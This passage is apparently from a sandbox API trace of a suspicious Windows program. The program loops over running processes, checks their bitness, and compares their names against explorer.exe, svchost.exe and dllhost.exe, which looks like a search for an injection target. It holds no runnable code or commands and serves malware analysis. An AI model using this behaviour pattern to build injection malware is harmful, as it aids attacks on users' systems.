hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.981] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.982] CloseHandle (hObject=0xec) returned 1 [0198.982] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0198.982] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0198.982] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0198.982] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0198.982] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0198.982] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.982] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.982] CloseHandle (hObject=0xec) returned 1 [0198.982] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0198.982] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0198.982] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0198.982] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0198.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0198.983] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.983] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.983] CloseHandle (hObject=0xec) returned 1 [0198.983] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0198.983] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0198.983] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0198.983] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0198.983] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0198.984] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.984] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.984] CloseHandle (hObject=0xec) returned 1 [0198.984] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0198.984] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0198.984] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0198.984] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0198.984] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0198.984] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.984] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.984] CloseHandle (hObject=0xec) returned 1 [0198.984] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0198.984] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0198.984] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0198.984] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0198.985] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0198.985] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.985] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.985] CloseHandle (hObject=0xec) returned 1 [0198.985] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0198.985] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0198.985] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0198.985] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0198.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0198.986] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.986] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.986] CloseHandle (hObject=0xec) returned 1 [0198.986] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0198.986] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0198.986] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0198.986] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.986] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0198.987] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0198.988] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0198.988] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0198.988] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0198.989] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0198.989] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0198.989] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0198.990] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0198.990] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0198.990] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.990] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.990] CloseHandle (hObject=0xec) returned 1 [0198.990] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0198.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0198.991] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.991] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.991] CloseHandle (hObject=0xec) returned 1 [0198.991] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0198.991] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0198.991] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0199.061] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0199.061] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0199.061] CloseHandle (hObject=0xec) returned 1 [0199.061] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0199.061] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0199.061] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0199.061] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0199.061] CloseHandle (hObject=0xec) returned 1 [0199.061] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.062] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0199.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0199.062] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0199.062] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0199.062] CloseHandle (hObject=0xec) returned 1 [0199.062] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0199.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0199.063] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0199.063] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0199.063] CloseHandle (hObject=0xec) returned 1 [0199.063] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0199.063] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0199.063] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0199.063] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0199.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0199.064] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0199.064] CloseHandle (hObject=0xe8) returned 1 [0199.064] Sleep (dwMilliseconds=0x3e8) [0200.091] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0200.093] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0200.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0200.094] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0200.094] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0200.094] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0200.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0200.095] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0200.095] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0200.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0200.096] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0200.096] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0200.096] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0200.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0200.097] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0200.097] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0200.097] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0200.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0200.098] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0200.098] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0200.098] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0200.099] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.099] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0200.099] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0200.100] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.100] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0200.100] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0200.101] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0200.101] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0200.101] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0200.102] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.102] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0200.102] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0200.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0200.103] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.103] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.103] CloseHandle (hObject=0xec) returned 1 [0200.103] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0200.103] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0200.103] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0200.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0200.104] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.104] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.104] CloseHandle (hObject=0xec) returned 1 [0200.104] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0200.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0200.104] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0200.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0200.105] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0200.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0200.105] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.106] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.106] CloseHandle (hObject=0xec) returned 1 [0200.106] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0200.106] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0200.106] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0200.106] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0200.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0200.106] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.106] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0200.106] CloseHandle (hObject=0xec) returned 1 [0200.106] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0200.106] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0200.106] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0200.106] Process32Next (in: 